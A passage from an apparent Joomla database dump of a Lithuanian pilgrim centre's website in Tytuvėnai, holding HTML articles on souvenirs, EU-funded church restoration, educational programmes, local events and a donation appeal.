auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/20151115/maiselis_tytuvenai{/gallery}</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">\r\n<h5>Puodelis juodas ,,Tytuvėnai\'\'</h5>\r\n<h5>Kaina 4,50 € </h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/20151115/puodelis_tytuvenai{/gallery}</span></p>\r\n</td>\r\n<td valign=\"top\">\r\n<h5>Baltasis šokoladas ,,Saldus atvirukas\'\'</h5>\r\n<h5>Kaina 3,00 € </h5>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=1 <span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">orientation=horizontal width=250</span> }stories/suvenyrai/20151115/saldus_atvirukas{/gallery}</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',0,0,0,53,'2013-05-28 10:48:50',135,'','2018-08-03 08:09:37',135,0,'0000-00-00 00:00:00','2013-05-28 10:48:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',71,0,5,'','',1,4390,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(181,265,'Projektai','projektai','','<p style=\"text-align: center;\"><img src=\"images/stories/projektai/bpd.png\" border=\"0\" /></p>\n<p class=\"MsoNormal\">VšĮ ,,Tytuvėnų piligrimų centras‘‘ pagal 2007-2013 m. Sanglaudos skatinimo veiksmų programos 1 prioriteto ,,Vietinė ir urbanistinė plėtra, kultūros paveldo išsaugojimas bei pritaikymas turizmo plėtrai VP3-1.3-ŪM-02-V priemonę ,,Viešųjų nekilnojamųjų kultūros paveldo objektų kompleksiškas pritaikymas turizmo reikmėms‘‘, įgyvendina <strong>projektą ,, Tytuvėnų Švč. Mergelės Marijos bažnyčios restauravimas ir pritaikymas viešojo kultūrinio turizmo reikmėms, II etapas‘‘.</strong></p>\n<p class=\"MsoNormal\"><strong>Projekto vykdytojas - </strong>VšĮ ,,Tytuvėnų piligrimų centras‘‘.</p>\n<p class=\"MsoNormal\"><strong>Projekto tikslas -</strong> atkurti ir restauruoti Tytuvėnų Švč. Mergelės Marijos bažnyčią, kompleksiškai pritaikyti objektą kultūrinio turizmo reikmėms.  Antras Projekto etapas- atliekami bažnyčios fasadų tvarkybos darbai, leidžiantys užtikrinti tinkamą viešąjį kultūros paveldo objekto lankymą.</p>\n<p class=\"MsoNormal\"><strong>Bendra projekto vertė:</strong> 2 937 316, 00 Lt.</p>\n<p class=\"MsoNormal\"><strong>Projekto finansavimo šaltiniai:</strong> ES  struktūrinių fondų finansavimas 2 937 316,00 Lt.</p>\n<p class=\"MsoNormal\"><strong>Projekto veiklų įgyvendinimo pradžia</strong> yra 2013 m. lapkričio 2 d.</p>\n<p><strong>Projekto veiklų įgyvendinimo  pabaiga</strong> yra 2015 m. vasario 28 d.</p>\n<p> </p>\n<p>VšĮ ,,Tytuvėnų piligrimų centras‘‘ pagal 2007-2013 m. Sanglaudos skatinimo veiksmų programos 1 prioriteto ,,Vietinė ir urbanistinė plėtra, kultūros paveldo išsaugojimas bei pritaikymas turizmo plėtrai VP3-1.3-ŪM-02-V priemonę ,,Viešųjų nekilnojamųjų kultūros paveldo objektų kompleksiškas pritaikymas turizmo reikmėms‘‘, įgyvendina <strong>projektą ,, Tytuvėnų Švč. Mergelės Marijos bažnyčios restauravimas ir pritaikymas viešojo kultūrinio turizmo reikmėms, I etapas‘‘.</strong></p>\n<p><strong>Projekto vykdytojas - </strong>VšĮ ,,Tytuvėnų piligrimų centras‘‘.<strong> </strong></p>\n<p><strong>Projekto tikslas -</strong> atkurti ir restauruoti Tytuvėnų Švč. Mergelės Marijos bažnyčią, kompleksiškai pritaikyti objektą kultūrinio turizmo reikmėms.  Pirmas Projekto etapas- atliekami bažnyčios stogo tvarkybos darbai, leidžiantys užtikrinti tinkamą viešąjį kultūros paveldo objekto lankymą.</p>\n<p><strong>Bendra projekto vertė:</strong> 2 299 506, 00 Lt.</p>\n<p><strong>Projekto finansavimo šaltiniai:</strong> ES  struktūrinių fondų finansavimas 1.989.992,00 Lt, pareiškėjo lėšos 309.514,00 Lt.</p>\n<p><strong>Projekto veiklų įgyvendinimo pradžia</strong> yra 2012 m. lapkričio 14 d.</p>\n<p><strong>Projekto veiklų įgyvendinimo  pabaiga</strong> yra 2013 m. lapkričio 30 d.<br /><br /></p>\n<p style=\"text-align: center;\"><img src=\"images/stories/projektai/3.jpg\" border=\"0\" /><br /> <img src=\"images/stories/projektai/2.jpg\" border=\"0\" /><br /> <img src=\"images/stories/projektai/1.jpg\" border=\"0\" /><br /> <img src=\"images/stories/projektai/4.jpg\" border=\"0\" /><br /> <img src=\"images/stories/projektai/5.jpg\" border=\"0\" /><br /> <img src=\"images/stories/projektai/6.jpg\" border=\"0\" /></p>','',1,0,0,53,'2013-08-14 19:17:03',135,'','2014-03-03 09:34:57',135,0,'0000-00-00 00:00:00','2013-08-14 19:17:03','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',11,0,2,'','',1,1703,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(182,266,'Veiklos strategija','veiklos-srategija','','<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/2021_2025_m_starteginis_veiklos_planas.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/2021_2025_m_starteginis_veiklos_planas.pdf\" target=\"_self\">VšĮ Tytuvėnų piligrimų centro veiklos strategija 2021-2025 metams</a></td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,53,'2013-09-12 04:45:54',135,'','2021-05-19 20:28:02',135,0,'0000-00-00 00:00:00','2013-09-12 04:45:54','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',10,0,8,'','',1,8365,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(183,267,'Edukacinės programos','edukacins-programos','','<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h2>Mažas šulinėlis, juodas vandenėlis....</h2>\r\n<h2><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=160}stories/veikla/edukacines_programos/mazas_sulinelis{/gallery}</span></h2>\r\n<p>Kas nori gurkšnoja, baltais laukais nešioja? Kas?</p>\r\n<p>Prieš 400 metų  Tytuvėnuose besikuriantys vienuoliai bernardinai pradėjo rūpintis ir knygų kaupimu. Buvo paplitęs posakis - ” Vienuolynas be knygų - kaip karo stovykla be ginklų”,o beraštis - kaip karys be ginklo. Kol nebuvo spausdinimo mašinų daugelį amžių knygos vienuolynuose buvo perrašinėjamos ranka.</p>\r\n<p>Tradiciškai vienuolynuose būdavo rašoma kronika, sudarinėjamos metrikų, pajamų ir išlaidų  knygos, turto aprašai, saugomi laiškai. Visi šie dokumentai rašyti ranka, lotynų ar lenkų kalbomis.</p>\r\n<p>Bernardinų vienuolių surinktas archyvas tebesaugomas Tytuvėnų bažnyčioje.</p>\r\n<p>Apsilankę  galėsite apžiūrėti  seniausias vienuolyno registracijos knygas, vizitacijos aktus, vyskupo Motiejaus Valančiaus laiškus. <br />Žąsies plunksną pamirkę į rašalą, rašysite Jums labiausiai patikusią lotynišką sentenciją. Gal štai šitą:  INTER BONOS BENE.</p>\r\n<p>Edukacinės programos kaina – 4 eur/asmeniui.<br />Minimalus dalyvių skaičius – 12.<br />Maksimalus dalyvių skaičius – 20.<br />Užsiėmimo trukmė - apie 1 val.<br />Edukaciniai užsiėmimai užsakomi iš anksto.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h2>Trys Dievo dovanos ir kiti kvapai.</h2>\r\n<h2><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/veikla/edukacines_programos/3_dievo_dovanos{/gallery}</span></h2>\r\n<p style=\"text-align: justify;\">Nuo seno vienuolynai garsėjo gėlynais ir sodais, vynuogynais ir daržais. Čia buvo puoselėjamos vaistažolininkystės tradicijos, kūno ir sielos savigydos būdai. Vienuolynų vaistažolių sodeliuose buvo aklimatizuojami augalai parsivežti iš tolimų svečių šalių, kurie vėliau tapo įprasti ir kaimo sodžiuose.</p>\r\n<p style=\"text-align: justify;\">Vienuolyno kronikoje rašoma, kad 1614 m. į naujai įsteigtą vienuolyną Tytuvėnų miestelyje kartu su pirmaisiais broliais, iš Krokuvos atvažiavo vienuolis Simonas Očko, apibūdinamas kaip stropus daržininkas. Žmogaus išmanančio sodininko darbus atsiuntimas Į besikuriančią vienuoliją, rodo, kad vaismedžių, vaiskrūmių, vaistažolių ar net gėlių auginimas, pritaikymas ir panaudojimas buvo svarbus ir vertinamas.</p>\r\n<p style=\"text-align: justify;\">Edukacinės programos metu pasakosime apie vienuolynų vaistažolių sodelių augalus, bandysime iš kvapo atpažinti žoles gyduoles, minsime mįsles, bandysime išgirsti žolynų muzikos garsus. Visi edukacinės programos dalyviai pasidarys po kvapų maišelį iš žolelių, kurios Jums labiausiai patiks. Pageidaujant pavaišinsime pagal Tytuvėnų vienuolyno virėjo receptą užplikyta arbata, ragausime sūrį iškeptą žolinių pabarstų pataluose.</p>\r\n<p>Edukacinės programos kaina:<br />5,00 eur/asmeniui, su sūriu ir arbata 7,00 eur/asmeniui.<br />Maksimalus dalyvių skaičius – 25<br />Užsiėmimo trukmė 1 valanda.</p>\r\n<p>Edukaciniai užsiėmimai užsakomi iš anksto.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 330px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/veikla/edukacines_programos/su_maldos_veriniu/{/gallery}</td>\r\n<td valign=\"top\">\r\n<h2>Su maldos vėriniu per pasaulį</h2>\r\n<p>Piligriminė kelionė – tai nepaprasta religinė patirtis, kasdienybės kelyje. Piligrimui, trokštančiam išgyventi bendrystę su Dievu ir pagilinti savo krikščioniškąjį gyvenimą, ypač svarbi malda, būtinos tylos ir atsitraukimo į vienumą akimirkos.</p>\r\n<p>Krikščioniškus maldos karolius, vadinamąjį rožančių ar rožinį galima rasti ne tik skarotų močiučių rankinėse ir ne tik ant futbolo ir kitų žvaigždžių kaklo,  bet ir dažno piligrimo kuprinėje. Ką šnabžda karolėlius varstančio žmogaus lūpos, kur kyla mintys, kokia prasmė dešimtis kartų kartoti tuos pačius žodžius, kur šios meditatyvios maldos tradicijos ištakos?..</p>\r\n<p>Edukacija „Su maldos vėriniu per pasaulį“ kviečia į kelionę, kurioje ir rasime atsakymus į šiuos ir daugelį kitų kylančių klausimų. Apžiūrėsime maldos karolius iš skirtingų pasaulio vietų ir aptarsime jų maldos būdus, peržvelgsime krikščioniškųjų maldos vėrinių istoriją. Aplankysime atkurtą Tytuvėnų vienuolio bernardino celę ir pamatysime autentišką XIXa. vienuolio rožinį. Šios edukacijos metu - nekantriausius mokysime karoliukus sujungti  į maldos vėrinį, o atkakliausius dar ir surišti pranciškonišką mazgą. Jūsų susivertas piligrimo rožinis galbūt, taps palydovu  kelionėse, o gal - mielu prisiminimu ar dovanėle iš Tytuvėnų.</p>\r\n<p>Edukacinės programos kaina – 4 eur/asmeniui.<br />Minimalus dalyvių skaičius – 12.<br />Maksimalus dalyvių skaičius – 20.<br />Užsiėmimo trukmė 1 val.</p>\r\n<p>Edukaciniai užsiėmimai užsakomi iš anksto.</p>\r\n<p><br /><br /><br /><br /><br /></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,53,'2014-03-11 13:51:28',135,'','2024-09-28 09:29:33',135,0,'0000-00-00 00:00:00','2014-03-11 13:51:28','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',62,0,1,'','',1,15855,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(358,447,'Tytuvėnams 725 metai','tytuvenams-725-metai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Rugpjūčio 13-15 d. vyko renginiai skirti Tytuvėnų 725 m. jubiliejui paminėti. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Rugpjūčio 13 d. miesto gyventojai, svečiai buvo pakviesti į  ,,Land art - Tytuva‘21‘‘ pristatymą, kiek vėliau į skulptoriaus Valiaus Remeikos jubiliejinio akmens atidengimą. Vakarinių renginių ciklą atidarė  gyvo garso festivalis ,,Ciongas‘‘  prie Giliaus ežero, kuris buvo skirtas jaunimui. Rugpjūčio 14 d. iškilmingas  šventės atidarymas miesto aikštėje, kiek vėliau parodų ,,Tytuvėnų žemių valdytojai‘‘ ir ,,Kuršių pilkapyno radiniai‘‘ atidarymas ir pristatymas VšĮ „Tytuvėnų piligrimų centre“ bei vakariniai dalyvių apdovanojimai ,,Tytuvelo‘‘ renginyje, koncertai prie Bridvaišio ežero. Paskutinę renginių dieną visi buvo kviečiami į Tytuvėnų Švč. Mergelės Marijos  Angelų karalienės bažnyčią, kur laukė iškilmingos Šv. Mišios žolinių Švč. Mergelės Marijos ėmimo į dangų iškilmės, jų metu buvo laiminami žolynai, gėlės. Po Šv. Mišių šventė persikėlė į Tytuvėnų vienuolyno rožyną, kuriame koncertinę programą paruošė  žydų ir šokių ansamblis ,,Fajerlech‘‘. </span><strong style=\"text-align: right; font-size: 12.16px;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\"><br /></span></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><span>{gallery cols=3 orientation=horizontal </span><span> width=320</span><span>}stories/naujienos/tytuvenai725/info/pics{/gallery}</span></span></p>',1,0,0,44,'2021-08-23 04:12:50',135,'','2021-08-23 04:16:36',135,0,'0000-00-00 00:00:00','2021-08-23 04:12:50','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/tytuvenai725\\/info\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,31,'','',1,1516,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(339,428,'Alinos Stonkutės-Čapienės fotografijos paroda','alinos-stonkutes-capienes-fotografijos-paroda','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Lapkričio 15 d. atidaryta Alinos Stonkutės-Čapienės fotografijos paroda \"M. Oginskio parko vandenų atmintis\".</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span>{gallery cols=3 orientation=horizontal width=140}stories/apiecentra/galerija/alina_stonkute_capiene{/gallery}</span></p>',1,0,0,44,'2019-11-18 18:49:24',135,'','2019-11-18 18:51:25',135,0,'0000-00-00 00:00:00','2019-11-18 18:49:24','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/alina_capiene\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,50,'','',1,1955,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(340,429,'Kviečiame į fotografijos parodą','kvieciame-i-fotografijos-paroda','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kviečiame į Alinos Stonkutės-Čapienės fotografijos parodą \"M. Oginskio parko vandenų atmintis\".</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span><img src=\"images/stories/naujienos/alina_capiene/parodos_skelbimas.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2019-11-18 18:58:12',135,'','2019-11-18 18:58:18',135,0,'0000-00-00 00:00:00','2019-11-18 18:58:12','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/alina_capiene\\/main1.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,49,'','',1,1756,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(184,269,'Parama','parama','','<p><span>VšĮ „Tytuvėnų piligrimų centras“ visus geros valios žmones kviečia prisidėti prie Tytuvėnų bažnyčios ir vienuolyno ansamblio išlaikymo.</span></p>\r\n<p> <strong>Kviečiame skirti 1,2 % GPM</strong></p>\r\n<p><strong> </strong><span>Jūsų geranoriška parama mums padės ir toliau judėti, kurti, veikti, gražinti ir gerinti aplinką. Juk parama 1,2 % GPM nieko nekainuoja. Paramą skirkite paspaudę ČIA.</span></p>\r\n<p> <a href=\"https://deklaravimas.vmi.lt/lt/Pradinis_Prisijungimo_puslapis/Prisijungimasperisorinessistemas.aspx\">https://deklaravimas.vmi.lt/lt/Pradinis_Prisijungimo_puslapis/Prisijungimasperisorinessistemas.aspx</a></p>\r\n<p> <span>Elektroninėje deklaravimo sistemoje (EDS) prašymą skirti paramą užpildysite lengvai, naudodamiesi paramos skyrimo vedliu.</span></p>\r\n<p><span> </span></p>\r\n<p><span>Mūsų rekvizitai:</span></p>\r\n<p>VšĮ „Tytuvėnų piligrimų centras“</p>\r\n<p>Įmonės kodas 301639534</p>\r\n<p>PVM kodas LT100010846612</p>\r\n<p>A.s. LT73 7300 0101 0722 1378</p>\r\n<p>Maironio g. 2A, LT – 86484, Tytuvėnai, Kelmės r.</p>\r\n<p>El. p. <a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a></p>\r\n<p><a href=\"http://www.infotytuvenai.lt/\">www.infotytuvenai.lt</a></p>\r\n<p> </p>','',1,0,0,31,'2013-05-28 11:37:03',135,'','2022-05-04 20:32:21',135,0,'0000-00-00 00:00:00','2013-05-28 11:37:03','0000-00-00 